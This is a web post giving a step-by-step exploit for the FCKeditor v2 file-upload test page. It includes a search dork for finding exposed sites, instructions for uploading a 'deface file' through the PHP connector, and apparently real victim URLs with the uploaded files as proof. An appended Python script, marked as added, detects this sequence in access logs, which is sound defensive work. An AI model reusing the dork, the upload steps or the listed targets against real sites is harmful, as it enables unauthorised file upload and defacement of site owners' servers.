
FCKeditor v2 remote File Upload Exploit





Google and Bing Dork: intitle:"FCKeditor - Uploaders Tests"
Category : Remote Upload
Exploit : http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html
Publisher : www.devilscafe.in 
Go to Google.com or Bing.com and type this dork: intitle:"FCKeditor - Uploaders Tests"
(use both search engines to get more vulnerable websites)

Now you will get the FCKeditor upload option; you can also reach the upload option by going to this URL:
http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html
Now change Select the "File Uploader" to use to PHP.



Then select your .txt deface file and click on "Send it to the Server" (some websites allow you to upload .html and .jpg files).


If your file uploaded successfully, you will get a "File uploaded with no errors" alert.
To view your file, see the Uploaded File URL,
or go to http://www.website.domain/userfiles/yourfilehere or http://www.website.domain/path/userfiles/yourfilehere
Live Demo : http://www.relationshiptrends.com/affiliate/fckeditor/editor/filemanager/connectors/uploadtest.html
http://minisite.nku.edu.tr/fckeditor/editor/filemanager/connectors/uploadtest.html 
Result :
http://minisite.nku.edu.tr//userfiles/aaaaaaaa.txt 
http://www.relationshiptrends.com/affiliate/img/aaaaaaaa.txt 
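
A defender-side view of the sequence above, as an added example that is not from the original post: it scans web-server access logs for a client that loads uploadtest.html, POSTs to a connector under the same directory, and then fetches a file from /userfiles/. The Combined Log Format, the connector script path in the sample lines, and the sample lines themselves are constructed assumptions.

```python
import re
from collections import defaultdict

# Paths taken from the post. Treating any POST under connectors/ as an upload
# attempt is an assumption; sites that store uploads elsewhere (the post shows
# an /img/ directory on one site) need USERFILES adjusted.
TEST_PAGE = re.compile(r"/editor/filemanager/connectors/uploadtest\.html", re.I)
CONNECTOR = re.compile(r"/editor/filemanager/connectors/", re.I)
USERFILES = re.compile(r"/userfiles/", re.I)

# Combined Log Format: ip - - [ts] "METHOD path proto" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2013:10:00:01 +0000] "GET /fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 5120
203.0.113.7 - - [10/Mar/2013:10:00:09 +0000] "POST /fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 200 310
203.0.113.7 - - [10/Mar/2013:10:00:15 +0000] "GET /userfiles/aaaaaaaa.txt HTTP/1.1" 200 42
198.51.100.4 - - [10/Mar/2013:10:02:00 +0000] "GET /fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 404 0
192.0.2.9 - - [10/Mar/2013:10:03:00 +0000] "GET /userfiles/logo.jpg HTTP/1.1" 200 9000
"""

def analyze(log_text):
    """Return (exposed, findings): exposed is True if the test page was served;
    findings maps client IP -> /userfiles/ paths fetched after a test-page
    view and a successful connector POST from the same IP."""
    exposed = False
    stage = defaultdict(int)  # 0 = nothing, 1 = saw test page, 2 = posted
    findings = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, path, status = m.group(1), m.group(2), m.group(3), int(m.group(4))
        ok = 200 <= status < 300
        if method == "GET" and TEST_PAGE.search(path):
            if ok:
                exposed = True
                stage[ip] = max(stage[ip], 1)
        elif method == "POST" and CONNECTOR.search(path) and ok and stage[ip] >= 1:
            stage[ip] = 2
        elif method == "GET" and USERFILES.search(path) and ok and stage[ip] == 2:
            findings[ip].append(path)
    return exposed, dict(findings)

if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

If `exposed` is true, the test page is being served and should be removed from the deployed editor directory, whether or not any upload sequence was found.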


Nadim Zobaer
